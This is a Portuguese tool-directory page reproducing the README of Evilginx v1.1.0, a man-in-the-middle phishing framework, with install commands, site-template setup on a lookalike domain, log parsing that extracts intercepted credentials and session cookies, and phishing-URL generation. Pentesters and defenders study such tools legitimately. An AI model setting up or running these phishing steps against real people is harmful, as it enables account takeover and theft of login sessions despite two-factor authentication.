Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
evilginx — POR FAVOR, USE A NOVA VERSÃO: https://github.com/kgretzky/evilginx2 | Kitploit
Ferramentas/GitHubGitHub/kgretzky/evilginx
Ferramentas de PhishingExploração de Aplicações WebPhishingTestes de PenetraçãoEngenharia SocialAutenticaçãoRed Teaming
GitHubkgretzky/evilginx

evilginx

POR FAVOR, USE A NOVA VERSÃO: https://github.com/kgretzky/evilginx2

Ver Repositório
1.2k281há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Evilginx v.1.1.0

Evilginx

ESTA VERSÃO ESTÁ OBSOLETA. USE A VERSÃO MAIS RECENTE!

EVILGINX 2: https://github.com/kgretzky/evilginx2

O Evilginx é um framework de ataque man-in-the-middle usado para phishing de credenciais e cookies de sessão de qualquer serviço web. Seu núcleo roda no servidor HTTP Nginx, que utiliza proxy_pass e sub_filter para fazer proxy e modificar conteúdo HTTP, enquanto intercepta o tráfego entre cliente e servidor.

Você pode aprender como funciona e como instalar tudo no meu blog:

Primeiro post ligeiramente desatualizado agora: Evilginx - Phishing Avançado com Bypass de Autenticação de Dois Fatores

Atualização Evilginx 1.0: Evilginx 1.0 Atualização - Aprimore seu Jogo em Phishing com 2FA

Atualização Evilginx 1.1: Evilginx 1.1 Atualização

Aviso

Estou ciente de que o Evilginx pode ser usado para propósitos muito nefastos. Este trabalho é meramente uma demonstração do que atacantes habilidosos podem fazer. É responsabilidade do defensor levar tais ataques em consideração ao configurar defesas e encontrar maneiras de se proteger contra este método de phishing. O Evilginx deve ser usado apenas em testes de penetração legítimos com permissão por escrito das partes que serão alvo de phishing.

Hall da Fama dos Contribuidores

@poweroftrue

Instalação

O Evilginx fornece um script de instalação install.sh que cuida de instalar todo o pacote em qualquer máquina Debian wheezy/jessie, de forma automática e sem complicações.

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

Uso

root@kitploit:~
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
Configuração

Ative ou desative configurações de site para uso com o servidor Nginx, usando os templates Evilginx fornecidos do diretório sites.

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

Liste os templates de configuração de site disponíveis:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Ative o site de phishing do google com o domínio de phishing pré-registrado not-really-google.com:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

Desative o site de phishing do facebook:

root@kitploit:~
python evilginx.py setup --disable facebook
Análise

Analise os logs do Nginx para extrair credenciais de login e cookies de sessão interceptados. Os logs, por padrão, são salvos no diretório logs, onde o script evilginx.py reside. Isso pode ser feito automaticamente após ativar a análise automática na fase de Configuração.

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Analise logs apenas para o site google:

root@kitploit:~
python evilginx.py parse -s google

Analise logs para todos os sites disponíveis:

root@kitploit:~
python evilginx.py parse -s all
Gerar URL

Gere URLs de phishing que você pode usar em suas Avaliações de Red Team.

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Gere URL de phishing do google que redirecionará a vítima para o vídeo rick'roll em caso de login bem-sucedido:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
Baixar ferramenta